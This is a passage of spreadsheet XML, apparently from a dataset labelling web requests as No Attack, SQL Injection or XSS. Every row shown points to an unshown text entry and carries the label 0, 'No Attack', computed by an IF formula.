      </c>
      <c r="B28251">
        <v>0</v>
      </c>
      <c r="C28251" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28252" s="1" t="s">
        <v>23050</v>
      </c>
      <c r="B28252">
        <v>0</v>
      </c>
      <c r="C28252" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28253" s="1" t="s">
        <v>30926</v>
      </c>
      <c r="B28253">
        <v>0</v>
      </c>
      <c r="C28253" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28254" s="1" t="s">
        <v>37137</v>
      </c>
      <c r="B28254">
        <v>0</v>
      </c>
      <c r="C28254" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28255" s="1" t="s">
        <v>35556</v>
      </c>
      <c r="B28255">
        <v>0</v>
      </c>
      <c r="C28255" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28256" s="1" t="s">
        <v>33011</v>
      </c>
      <c r="B28256">
        <v>0</v>
      </c>
      <c r="C28256" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28257" s="1" t="s">
        <v>20989</v>
      </c>
      <c r="B28257">
        <v>0</v>
      </c>
      <c r="C28257" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28258" s="1" t="s">
        <v>21627</v>
      </c>
      <c r="B28258">
        <v>0</v>
      </c>
      <c r="C28258" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28259" s="1" t="s">
        <v>36962</v>
      </c>
      <c r="B28259">
        <v>0</v>
      </c>
      <c r="C28259" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28260" s="1" t="s">
        <v>36091</v>
      </c>
      <c r="B28260">
        <v>0</v>
      </c>
      <c r="C28260" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28261" s="1" t="s">
        <v>34746</v>
      </c>
      <c r="B28261">
        <v>0</v>
      </c>
      <c r="C28261" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28262" s="1" t="s">
        <v>30751</v>
      </c>
      <c r="B28262">
        <v>0</v>
      </c>
      <c r="C28262" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28263" s="1" t="s">
        <v>21727</v>
      </c>
      <c r="B28263">
        <v>0</v>
      </c>
      <c r="C28263" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28264" s="1" t="s">
        <v>34374</v>
      </c>
      <c r="B28264">
        <v>0</v>
      </c>
      <c r="C28264" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28265" s="1" t="s">
        <v>21084</v>
      </c>
      <c r="B28265">
        <v>0</v>
      </c>
      <c r="C28265" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28266" s="1" t="s">
        <v>33044</v>
      </c>
      <c r="B28266">
        <v>0</v>
      </c>
      <c r="C28266" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28267" s="1" t="s">
        <v>20369</v>
      </c>
      <c r="B28267">
        <v>0</v>
      </c>
      <c r="C28267" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28268" s="1" t="s">
        <v>34114</v>
      </c>
      <c r="B28268">
        <v>0</v>
      </c>
      <c r="C28268" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28269" s="1" t="s">
        <v>20104</v>
      </c>
      <c r="B28269">
        <v>0</v>
      </c>
      <c r="C28269" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28270" s="1" t="s">
        <v>21969</v>
      </c>
      <c r="B28270">
        <v>0</v>
      </c>
      <c r="C28270" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28271" s="1" t="s">
        <v>36302</v>
      </c>
      <c r="B28271">
        <v>0</v>
      </c>
      <c r="C28271" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28272" s="1" t="s">
        <v>23696</v>
      </c>
      <c r="B28272">
        <v>0</v>
      </c>
      <c r="C28272" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28273" s="1" t="s">
        <v>37077</v>
      </c>
      <c r="B28273">
        <v>0</v>
      </c>
      <c r="C28273" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28274" s="1" t="s">
        <v>30419</v>
      </c>
      <c r="B28274">
        <v>0</v>
      </c>
      <c r="C28274" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28275" s="1" t="s">
        <v>21904</v>
      </c>
      <c r="B28275">
        <v>0</v>
      </c>
      <c r="C28275" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28276" s="1" t="s">
        <v>21538</v>
      </c>
      <c r="B28276">
        <v>0</v>
      </c>
      <c r="C28276" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28277" s="1" t="s">
        <v>20931</v>
      </c>
      <c r="B28277">
        <v>0</v>
      </c>
      <c r="C28277" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28278" s="1" t="s">
        <v>20367</v>
      </c>
      <c r="B28278">
        <v>0</v>
      </c>
      <c r="C28278" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28279" s="1" t="s">
        <v>22111</v>
      </c>
      <c r="B28279">
        <v>0</v>
      </c>
      <c r="C28279" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28280" s="1" t="s">
        <v>28601</v>
      </c>
      <c r="B28280">
        <v>0</v>
      </c>
      <c r="C28280" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28281" s="1" t="s">
        <v>30505</v>
      </c>
      <c r="B28281">
        <v>0</v>
      </c>
      <c r="C28281" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28282" s="1" t="s">
        <v>21793</v>
      </c>
      <c r="B28282">
        <v>0</v>
      </c>
      <c r="C28282" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28283" s="1" t="s">
        <v>30387</v>
      </c>
      <c r="B28283">
        <v>0</v>
      </c>
      <c r="C28283" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28284" s="1" t="s">
        <v>20811</v>
      </c>
      <c r="B28284">
        <v>0</v>
      </c>
      <c r="C28284" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28285" s="1" t="s">
        <v>23040</v>
      </c>
      <c r="B28285">
        <v>0</v>
      </c>
      <c r="C28285" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28286" s="1" t="s">
        <v>20657</v>
      </c>
      <c r="B28286">
        <v>0</v>
      </c>
      <c r="C28286" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28287" s="1" t="s">
        <v>29988</v>
      </c>
      <c r="B28287">
        <v>0</v>
      </c>
      <c r="C28287" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28288" s="1" t="s">
        <v>32684</v>
      </c>
      <c r="B28288">
        <v>0</v>
      </c>
      <c r="C28288" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28289" s="1" t="s">
        <v>21718</v>
      </c>
      <c r="B28289">
        <v>0</v>
      </c>
      <c r="C28289" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28290" s="1" t="s">
        <v>31255</v>
      </c>
      <c r="B28290">
        <v>0</v>
      </c>
      <c r="C28290" s="7" t="str">
        <f t="shared" si="441"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28291" s="1" t="s">
        <v>20952</v>
      </c>
      <c r="B28291">
        <v>0</v>
      </c>
      <c r="C28291" s="7" t="str">
        <f t="shared" ref="C28291:C28354" si="442">IF(B28291=0,"No Attack", IF(B28291=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28292" s="1" t="s">
        <v>24276</v>
      </c>
      <c r="B28292">
        <v>0</v>
      </c>
      <c r="C28292" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28293" s="1" t="s">
        <v>27433</v>
      </c>
      <c r="B28293">
        <v>0</v>
      </c>
      <c r="C28293" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28294" s="1" t="s">
        <v>33919</v>
      </c>
      <c r="B28294">
        <v>0</v>
      </c>
      <c r="C28294" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28295" s="1" t="s">
        <v>36798</v>
      </c>
      <c r="B28295">
        <v>0</v>
      </c>
      <c r="C28295" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28296" s="1" t="s">
        <v>36617</v>
      </c>
      <c r="B28296">
        <v>0</v>
      </c>
      <c r="C28296" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28297" s="1" t="s">
        <v>27392</v>
      </c>
      <c r="B28297">
        <v>0</v>
      </c>
      <c r="C28297" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28298" s="1" t="s">
        <v>28552</v>
      </c>
      <c r="B28298">
        <v>0</v>
      </c>
      <c r="C28298" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28299" s="1" t="s">
        <v>31621</v>
      </c>
      <c r="B28299">
        <v>0</v>
      </c>
      <c r="C28299" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28300" s="1" t="s">
        <v>31431</v>
      </c>
      <c r="B28300">
        <v>0</v>
      </c>
      <c r="C28300" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28301" s="1" t="s">
        <v>27119</v>
      </c>
      <c r="B28301">
        <v>0</v>
      </c>
      <c r="C28301" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28302" s="1" t="s">
        <v>24129</v>
      </c>
      <c r="B28302">
        <v>0</v>
      </c>
      <c r="C28302" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28303" s="1" t="s">
        <v>22343</v>
      </c>
      <c r="B28303">
        <v>0</v>
      </c>
      <c r="C28303" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28304" s="1" t="s">
        <v>28399</v>
      </c>
      <c r="B28304">
        <v>0</v>
      </c>
      <c r="C28304" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28305" s="1" t="s">
        <v>31694</v>
      </c>
      <c r="B28305">
        <v>0</v>
      </c>
      <c r="C28305" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28306" s="1" t="s">
        <v>22011</v>
      </c>
      <c r="B28306">
        <v>0</v>
      </c>
      <c r="C28306" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28307" s="1" t="s">
        <v>23063</v>
      </c>
      <c r="B28307">
        <v>0</v>
      </c>
      <c r="C28307" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28308" s="1" t="s">
        <v>29458</v>
      </c>
      <c r="B28308">
        <v>0</v>
      </c>
      <c r="C28308" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28309" s="1" t="s">
        <v>28324</v>
      </c>
      <c r="B28309">
        <v>0</v>
      </c>
      <c r="C28309" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28310" s="1" t="s">
        <v>27931</v>
      </c>
      <c r="B28310">
        <v>0</v>
      </c>
      <c r="C28310" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28311" s="1" t="s">
        <v>31051</v>
      </c>
      <c r="B28311">
        <v>0</v>
      </c>
      <c r="C28311" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28312" s="1" t="s">
        <v>35544</v>
      </c>
      <c r="B28312">
        <v>0</v>
      </c>
      <c r="C28312" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28313" s="1" t="s">
        <v>36553</v>
      </c>
      <c r="B28313">
        <v>0</v>
      </c>
      <c r="C28313" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28314" s="1" t="s">
        <v>27812</v>
      </c>
      <c r="B28314">
        <v>0</v>
      </c>
      <c r="C28314" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28315" s="1" t="s">
        <v>33534</v>
      </c>
      <c r="B28315">
        <v>0</v>
      </c>
      <c r="C28315" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28316" s="1" t="s">
        <v>21932</v>
      </c>
      <c r="B28316">
        <v>0</v>
      </c>
      <c r="C28316" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28317" s="1" t="s">
        <v>23018</v>
      </c>
      <c r="B28317">
        <v>0</v>
      </c>
      <c r="C28317" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28318" s="1" t="s">
        <v>22390</v>
      </c>
      <c r="B28318">
        <v>0</v>
      </c>
      <c r="C28318" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28319" s="1" t="s">
        <v>10908</v>
      </c>
      <c r="B28319">
        <v>0</v>
      </c>
      <c r="C28319" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28320" s="1" t="s">
        <v>10909</v>
      </c>
      <c r="B28320">
        <v>0</v>
      </c>
      <c r="C28320" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28321" s="1" t="s">
        <v>10306</v>
      </c>
      <c r="B28321">
        <v>0</v>
      </c>
      <c r="C28321" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28322" s="1" t="s">
        <v>10307</v>
      </c>
      <c r="B28322">
        <v>0</v>
      </c>
      <c r="C28322" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28323" s="1" t="s">
        <v>10308</v>
      </c>
      <c r="B28323">
        <v>0</v>
      </c>
      <c r="C28323" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28324" s="1" t="s">
        <v>10309</v>
      </c>
      <c r="B28324">
        <v>0</v>
      </c>
      <c r="C28324" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28325" s="1" t="s">
        <v>10310</v>
      </c>
      <c r="B28325">
        <v>0</v>
      </c>
      <c r="C28325" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28326" s="1" t="s">
        <v>10311</v>
      </c>
      <c r="B28326">
        <v>0</v>
      </c>
      <c r="C28326" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28327" s="1" t="s">
        <v>10312</v>
      </c>
      <c r="B28327">
        <v>0</v>
      </c>
      <c r="C28327" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28328" s="1" t="s">
        <v>10313</v>
      </c>
      <c r="B28328">
        <v>0</v>
      </c>
      <c r="C28328" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28329" s="1" t="s">
        <v>10314</v>
      </c>
      <c r="B28329">
        <v>0</v>
      </c>
      <c r="C28329" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28330" s="1" t="s">
        <v>10315</v>
      </c>
      <c r="B28330">
        <v>0</v>
      </c>
      <c r="C28330" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28331" s="1" t="s">
        <v>10316</v>
      </c>
      <c r="B28331">
        <v>0</v>
      </c>
      <c r="C28331" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28332" s="1" t="s">
        <v>10910</v>
      </c>
      <c r="B28332">
        <v>0</v>
      </c>
      <c r="C28332" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28333" s="1" t="s">
        <v>10911</v>
      </c>
      <c r="B28333">
        <v>0</v>
      </c>
      <c r="C28333" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28334" s="1" t="s">
        <v>26955</v>
      </c>
      <c r="B28334">
        <v>0</v>
      </c>
      <c r="C28334" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28335" s="1" t="s">
        <v>22131</v>
      </c>
      <c r="B28335">
        <v>0</v>
      </c>
      <c r="C28335" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28336" s="1" t="s">
        <v>33999</v>
      </c>
      <c r="B28336">
        <v>0</v>
      </c>
      <c r="C28336" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28337" s="1" t="s">
        <v>22933</v>
      </c>
      <c r="B28337">
        <v>0</v>
      </c>
      <c r="C28337" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28338" s="1" t="s">
        <v>20867</v>
      </c>
      <c r="B28338">
        <v>0</v>
      </c>
      <c r="C28338" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28339" s="1" t="s">
        <v>22092</v>
      </c>
      <c r="B28339">
        <v>0</v>
      </c>
      <c r="C28339" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28340" s="1" t="s">
        <v>30740</v>
      </c>
      <c r="B28340">
        <v>0</v>
      </c>
      <c r="C28340" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28341" s="1" t="s">
        <v>37196</v>
      </c>
      <c r="B28341">
        <v>0</v>
      </c>
      <c r="C28341" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28342" s="1" t="s">
        <v>27728</v>
      </c>
      <c r="B28342">
        <v>0</v>
      </c>
      <c r="C28342" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28343" s="1" t="s">
        <v>24278</v>
      </c>
      <c r="B28343">
        <v>0</v>
      </c>
      <c r="C28343" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28344" s="1" t="s">
        <v>28713</v>
      </c>
      <c r="B28344">
        <v>0</v>
      </c>
      <c r="C28344" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28345" s="1" t="s">
        <v>35117</v>
      </c>
      <c r="B28345">
        <v>0</v>
      </c>
      <c r="C28345" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28346" s="1" t="s">
        <v>36392</v>
      </c>
      <c r="B28346">
        <v>0</v>
      </c>
      <c r="C28346" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28347" s="1" t="s">
        <v>32507</v>
      </c>
      <c r="B28347">
        <v>0</v>
      </c>
      <c r="C28347" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28348" s="1" t="s">
        <v>33211</v>
      </c>
      <c r="B28348">
        <v>0</v>
      </c>
      <c r="C28348" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28349" s="1" t="s">
        <v>21546</v>
      </c>
      <c r="B28349">
        <v>0</v>
      </c>
      <c r="C28349" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28350" s="1" t="s">
        <v>37225</v>
      </c>
      <c r="B28350">
        <v>0</v>
      </c>
      <c r="C28350" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28351" s="1" t="s">
        <v>35332</v>
      </c>
      <c r="B28351">
        <v>0</v>
      </c>
      <c r="C28351" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28352" s="1" t="s">
        <v>28722</v>
      </c>
      <c r="B28352">
        <v>0</v>
      </c>
      <c r="C28352" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28353" s="1" t="s">
        <v>31363</v>
      </c>
      <c r="B28353">
        <v>0</v>
      </c>
      <c r="C28353" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28354" s="1" t="s">
        <v>35354</v>
      </c>
      <c r="B28354">
        <v>0</v>
      </c>
      <c r="C28354" s="7" t="str">
        <f t="shared" si="442"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28355" s="1" t="s">
        <v>22626</v>
      </c>
      <c r="B28355">
        <v>0</v>
      </c>
      <c r="C28355" s="7" t="str">
